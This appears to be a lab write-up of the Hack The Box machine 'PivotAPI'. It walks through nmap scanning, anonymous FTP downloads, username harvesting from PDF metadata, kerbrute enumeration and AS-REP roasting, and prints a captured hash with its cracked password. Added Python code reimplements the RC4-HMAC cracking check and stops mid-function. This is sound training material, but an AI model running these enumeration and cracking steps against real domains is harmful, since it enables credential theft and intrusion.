HTB_machines

cvestone, published 2024-01-15



PivotAPI

Study notes following the "红队笔记" (Red Team Notes) series

Machine description

PivotAPI is an insane machine that involves user enumeration through the metadata of PDFs which are downloaded from an FTP file share server. Since the user has not got pre-auth with Kerberos, it is possible to request a TGT for him, which can be cracked with Hashcat. With the provided credentials, an SMB enumeration exposes an executable which, when reverse engineered, reveals credentials to authenticate to MSSQL. After gaining access to the system it is possible to locate a KeePass database on the target, leading to further misconfiguration abuse through Active Directory, which leads to obtaining the Administrator's password through LAPS and thus getting execution on the target through `psexec` as user Administrator.

Difficulty

Insane

Information gathering

Detailed TCP scan:

sudo nmap -sT -sV -sC -O -p$tcports $ip1 -oA nmapscan/tcpdetails
# Nmap 7.94SVN scan initiated Mon Jan 15 15:24:33 2024 as: nmap -sT -sV -sC -O -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389,49667,49677,49678,49710,49784 -oA nmapscan/tcpdetails 10.129.228.115
Nmap scan report for 10.129.228.115 (10.129.228.115)
Host is up (0.38s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  02:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  02:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  11:55AM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  02:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  12:18PM               219091 notes1.pdf
| 08-08-20  12:34PM               279445 notes2.pdf
| 08-08-20  12:41PM                  105 README.txt
|_02-19-21  02:06PM              1301120 RHUL-MA-2009-06.pdf
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-15 08:24:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.129.228.115:1433: 
|     Target_Name: LICORDEBELLOTA
|     NetBIOS_Domain_Name: LICORDEBELLOTA
|     NetBIOS_Computer_Name: PIVOTAPI
|     DNS_Domain_Name: LicorDeBellota.htb
|     DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|     DNS_Tree_Name: LicorDeBellota.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-15T08:22:52
|_Not valid after:  2054-01-15T08:22:52
| ms-sql-info: 
|   10.129.228.115:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-01-15T08:26:05+00:00; +59m39s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49784/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 59m38s, deviation: 0s, median: 59m38s
| smb2-time: 
|   date: 2024-01-15T08:25:25
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 15 15:26:39 2024 -- 1 IP address (1 host up) scanned in 126.25 seconds

The nmap vuln scripts and the UDP scan returned nothing useful, so they are skipped here.

Scan analysis

The scan shows DNS_Computer_Name PivotAPI.LicorDeBellota.htb at 10.129.228.115, and the open port set (53 DNS, 88 Kerberos, 389/636 LDAP(S), 3268/3269 global catalog, 464 kpasswd, 9389 ADWS) is the signature of a domain controller. Add both the host name and the domain name to /etc/hosts so they resolve in later commands. Two other details in the output matter later: SMB signing is enabled and required, so SMB relay against this host is off the table; and the clock skew is +59m38s, far beyond the 5-minute tolerance Kerberos allows. Requests that need no pre-authentication still work, but any real Kerberos authentication from this box (-k, service ticket requests, psexec with a ccache) will fail with KRB_AP_ERR_SKEW until the attack host's clock is synced to the DC (for example with ntpdate or faketime).
From an attack-surface point of view, experience says to try ports 21, 445, 88 and 3268 first.

Exploitation

Anonymous FTP: download the files

The ftp client can connect and fetch each file, but downloads tend to go wrong unless several options are set, and above all binary mode must be enabled. wget mirrors the whole share in one go and handles this for you; any string works as the anonymous password:

wget -m ftp://anonymous:anything@LicorDeBellota.htb
Initial look at the files for sensitive information
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# ls
10.1.1.414.6453.pdf                           BHUSA09-McDonald-WindowsHeap-PAPER.pdf  notes1.pdf  README.txt
28475-linux-stack-based-buffer-overflows.pdf  ExploitingSoftware-Ch07.pdf             notes2.pdf  RHUL-MA-2009-06.pdf

Only one file is a .txt; the rest are PDFs. Treat the PDFs as untrusted input and don't open them yet; read the txt first:

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat README.txt       
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.

Look at the metadata of the remaining files first; it is a quick way to pull out potentially sensitive fields such as author names:

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# exiftool *.pdf |less

less is used so the output can be scrolled through.

The Creator and Author fields are the promising ones; pull them out with a text-processing pipeline:

exiftool *.pdf | grep -iE 'creator|author' | awk -F ':' '{print $2}' | grep -vi microsoft | grep -vE '[0-9]' | uniq | tail -n 4 | sort | tee pdf_authors

The `tail -n 4` is tuned to this particular output (the last four values are the human names); against an unknown set of files use `sort -u` instead and review the list by hand.

Output:

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat pdf_authors 
 alex
 byron gronseth
 Kaorz
 saif

Next, skim each PDF. None of them contains credentials or similar sensitive data; most are reference papers on stack and heap buffer overflows, and the introductions name the authors' universities. Nothing usable for now, so set them aside and come back to them only if nothing else pans out.

Try to list SMB shares

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# crackmapexec smb $ip1
SMB         10.129.228.115  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
                                                                                                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbmap -H $ip1          

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbclient -L //$ip1 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

None of these lists a share without credentials. The smbmap traceback is smbmap failing to handle STATUS_ACCESS_DENIED (a client-side bug), not something on the target; smbclient's anonymous login succeeds but the share list comes back empty.

Try RPC

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U '' -N $ip1             
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

A null session binds, but every SAMR and srvsvc query is denied, so nothing can be enumerated over RPC without credentials.

User enumeration

Since this is a domain environment, try kerbrute, which enumerates usernames over Kerberos.

Kerberos authenticates principals with long-term keys derived from their passwords rather than by sending the password itself. kerbrute's userenum sends an AS-REQ without pre-authentication data for every name in the list: for a non-existent principal the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN, for an existing one KDC_ERR_PREAUTH_REQUIRED (or a full AS-REP if the account has pre-auth disabled). That distinguishes valid usernames without ever submitting a password, so badPwdCount is not incremented and the lockout policy is never triggered. It is fast, but not silent: every probe is logged on the DC as Event ID 4768 (a failed TGT request, result code 0x6 for unknown principals), so a SIEM can spot a burst of them.

On an ARM machine (for example Apple silicon) kerbrute has to be built from source. In the cloned repository, add arm64 to the ARCHS= line at the top of the Makefile and run make linux; if a module is reported missing, install it and rerun the command.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kerbrute userenum -d LicorDebellota.htb --dc $ip1 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/27/24 - Ronnie Flathers @ropnop

2024/01/27 17:28:05 >  Using KDC(s):
2024/01/27 17:28:05 >   10.129.228.115:88

2024/01/27 17:28:31 >  [+] VALID USERNAME:       jari@LicorDebellota.htb
2024/01/27 17:31:31 >  [+] VALID USERNAME:       administrador@LicorDebellota.htb
2024/01/27 17:37:38 >  [+] VALID USERNAME:       sshd@LicorDebellota.htb
2024/01/27 17:52:40 >  [+] VALID USERNAME:       lothbrok@LicorDebellota.htb
2024/01/27 18:21:43 >  Done! Tested 8295455 usernames (4 valid) in 3218.585 seconds

-t sets the thread count; pick it according to your hardware and the target's defences, since too high a request rate is easy to detect and block.
Add the newly found usernames to the pdf_authors list from the earlier collection:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp pdf_authors users_list              
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt users_list
# note: nt is a command I renamed myself
                           
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat users_list           
alex
byron gronseth
byron
gronseth
Kaorz
saif
jari
administrador
sshd
lothbrok

The second entry is a first and last name, so it is split into two separate candidates as well, to widen the search.
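As an added example (not from the original post, and not the author's renamed nt tool), the following Python does the two steps above reproducibly: it parses exiftool's default `Field : Value` output, keeps only Author/Creator values that look like people rather than tooling (no digits, none of the product words listed), and expands multi-word names into the username forms commonly seen in AD (first, last, first.last, flast, and so on), which goes further than the two splits shown on the page. The exiftool output embedded in it is constructed to mirror the fields seen on this box, not copied from the real PDFs.

```python
import re

# Constructed sample of `exiftool *.pdf` output (not the page's real output);
# the "Tag : Value" layout and the ======== file separators follow exiftool's default format.
SAMPLE_EXIFTOOL_OUTPUT = """\
======== 10.1.1.414.6453.pdf
File Name                       : 10.1.1.414.6453.pdf
Creator                         : Microsoft Word 2010
Author                          : Kaorz
======== notes1.pdf
Creator                         : Writer
Author                          : byron gronseth
Producer                        : OpenOffice.org 3.2
======== notes2.pdf
Creator                         : TeX
Author                          : saif
======== RHUL-MA-2009-06.pdf
Creator                         : Adobe Acrobat 9.0
Author                          : alex
======== ExploitingSoftware-Ch07.pdf
Author                          : Microsoft Office User
"""

AUTHOR_FIELDS = {"author", "creator"}
# Substrings that mark a value as software rather than a person; extend as you meet new ones.
TOOL_HINTS = ("microsoft", "adobe", "acrobat", "openoffice", "libreoffice", "writer", "tex", "word", "pdf")
FIELD_RE = re.compile(r"^([A-Za-z][\w /-]*?)\s*:\s(.*)$")


def parse_exiftool(text):
    """Yield (field, value) pairs from exiftool's default text output, field names lowercased."""
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            yield m.group(1).strip().lower(), m.group(2).strip()


def extract_people(text):
    """Author/Creator values that look like people, in first-seen order, case preserved."""
    names = []
    for field, value in parse_exiftool(text):
        if field not in AUTHOR_FIELDS or not value:
            continue
        low = value.lower()
        if any(ch.isdigit() for ch in value) or any(h in low for h in TOOL_HINTS):
            continue  # version strings and product names are tooling, not users
        if value not in names:
            names.append(value)
    return names


def username_candidates(name):
    """Expand a display name into the account-name forms typically found in AD."""
    parts = name.lower().split()
    if len(parts) == 1:
        return [parts[0]]
    first, last = parts[0], parts[-1]
    return [first, last, f"{first}.{last}", f"{first[0]}{last}",
            f"{first}{last}", f"{first}_{last}", f"{first}{last[0]}"]


def build_user_list(text, extra=()):
    """Combined, de-duplicated candidate list: PDF authors plus names found by other means."""
    users = []
    for name in list(extract_people(text)) + list(extra):
        for cand in username_candidates(name):
            if cand not in users:
                users.append(cand)
    return users


if __name__ == "__main__":
    # Feed the result to kerbrute or GetNPUsers -usersfile.
    print("\n".join(build_user_list(SAMPLE_EXIFTOOL_OUTPUT, extra=["jari", "administrador"])))
```

Kerberos principal names are case-insensitive, so lowercasing costs nothing; the filter is deliberately aggressive (a real author named "Writer" would be dropped), which is the right trade-off when the list is going to be fed to a noisy enumeration tool.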

Attempt AS-REP roasting

Whenever you collect a set of candidate usernames during a domain engagement, test them for AS-REP roasting: if any account has UF_DONT_REQUIRE_PREAUTH set, the KDC returns an AS-REP for it without any proof that the requester knows the password. With pre-authentication enabled, the AS (Authentication Service) demands a timestamp encrypted with the user's key before it issues a TGT, which is the extra safeguard; with it disabled, anyone who knows the username can obtain the AS-REP. Its encrypted part is protected with a key derived from the user's password (for etype 23, the NT hash), so it can be taken offline and cracked even though we never authenticated.

The attack uses the GetNPUsers.py script from impacket. Find it with locate (install locate with apt and run updatedb first):

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# updatedb

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# locate -i getnp       
/pentest/impacket/build/scripts-3.11/GetNPUsers.py
/pentest/impacket/examples/GetNPUsers.py
/usr/local/bin/GetNPUsers.py
/usr/local/bin/__pycache__/GetNPUsers.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
# Symlink the last path so the script is on PATH:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetNPUsers.py /usr/bin/GetNPUsers.py
                            
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -h    
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address] [-dc-host hostname]
                     target

Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

positional arguments:
  target                [[domain/]username[:password]]

options:
  -h, --help            show this help message and exit
  -request              Requests TGT for users and output them in JtR/hashcat format (default False)
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -format {hashcat,john}
                        format to save the AS_REQ of users without pre-authentication. Default is hashcat
  -usersfile USERSFILE  File with user per line to test
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

Run the script:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -no-pass -dc-ip $ip1 LicorDebellota.htb/ -usersfile users_list
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User jari doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrador doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lothbrok doesn't have UF_DONT_REQUIRE_PREAUTH set

Note the trailing / after the domain name. The output gives us the AS-REP hash for user Kaorz (the 23 after $krb5asrep$ is the encryption type, RC4-HMAC, which is what makes it cheap to crack): $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3

This raises the question of why pre-authentication would be required for some accounts and not for others. Common reasons:

(1) Compatibility: old Kerberos clients may not support pre-authentication, so the flag was set on some accounts to keep them working;
(2) Convenience: an administrator removed the step to simplify a login flow;
(3) A requirement of a specific application or service.
None of these are under the attacker's control, but each one leaves a gap to exploit.

Save the extracted hash in its own file and crack it with john or hashcat:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                          
└─# john --wordlist=/usr/share/wordlists/rockyou.txt Kaorz_hash                                                                     
Using default input encoding: UTF-8                                                 
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])                                                                   
Will run 20 OpenMP threads                                                     
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                                                                    
Roper4155        ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)                                                                                                                                        
1g 0:00:00:03 DONE (2024-01-27 23:32) 0.2652g/s 2830Kp/s 2830Kc/s 2830KC/s S100195..Ronald8                                                                                                      
Use the "--show" option to display all of the cracked passwords reliably                                                                                                                         
Session completed.                                                                     
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                                                                                                          
└─# hashcat --help | grep -i rep                                                                                                                                                                 
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16                                                                     
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol                                                                                                          
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol                                                                                                          
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol                                                                                                          
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol                                            
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                                                                                                          
└─# hashcat -m 18200 Kaorz_hash /usr/share/wordlists/rockyou.txt                                                                                                                                 
hashcat (v6.2.6) starting                                                                         
OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                               
==================================================================================================================================================                                               
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU                                                                                      

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256 

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 5 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff77395
6ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1
e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3:Roper4155
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c...f59cb3
Time.Started.....: Sat Jan 27 23:34:25 2024 (2 secs)
Time.Estimated...: Sat Jan 27 23:34:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5252.7 kH/s (2.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10670080/14344385 (74.39%)
Rejected.........: 0/10670080 (0.00%)
Restore.Point....: 10649600/14344385 (74.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SEXY#2 -> RonaldoNathan
Hardware.Mon.#1..: Temp: 62c Util: 65%

Started: Sat Jan 27 23:34:09 2024
Stopped: Sat Jan 27 23:34:27 2024

Both tools recover the password Roper4155; record it in the engagement notes. Before running hashcat you have to choose the mode with -m; the signature at the start of the hash ($krb5asrep$23$) identifies it as 18200 (Kerberos 5, etype 23, AS-REP). john detects the format itself, which makes it the quicker choice here.
With a credential in hand, check it against every exposed service. SSH (22) rejects the login, so this account has no SSH access.
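As an added example (not from the original post, nor impacket's, john's or hashcat's code), here is the per-candidate test that hashcat -m 18200 performs for each wordlist entry, in pure Python: derive the NT hash, re-derive the RFC 4757 RC4-HMAC keys for key usage 8 (the AS-REP enc-part), decrypt, and compare the HMAC-MD5 checksum that sits in front of the ciphertext. It also parses the $krb5asrep$23$user@REALM:checksum$edata line format that GetNPUsers.py prints. The hash it cracks is constructed inside the block from a chosen password and a stand-in plaintext (not real ASN.1 and not the page's ticket); the MD4 implementation is included because hashlib's md4 is usually disabled on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

M32 = 0xFFFFFFFF
AS_REP_USAGE = 8  # Kerberos key-usage number for the AS-REP enc-part (RFC 4120 section 7.5.1)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # the word updated each step cycles a, d, c, b
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = rotl((v[t] + fn(p, q, r) + x[k] + const) & M32, shifts[i % 4])
        state = [(s + w) & M32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The etype 23 long-term key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 encryption: returns (checksum, RC4(K3, confounder || plaintext))."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    body = confounder + plaintext
    checksum = hmac_md5(k1, body)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, body)


def rc4hmac_verify(key, usage, checksum, edata) -> bool:
    """What a cracker does per candidate: rebuild K1/K3, decrypt, compare the HMAC."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    k3 = hmac_md5(k1, checksum)
    body = rc4(k3, edata)
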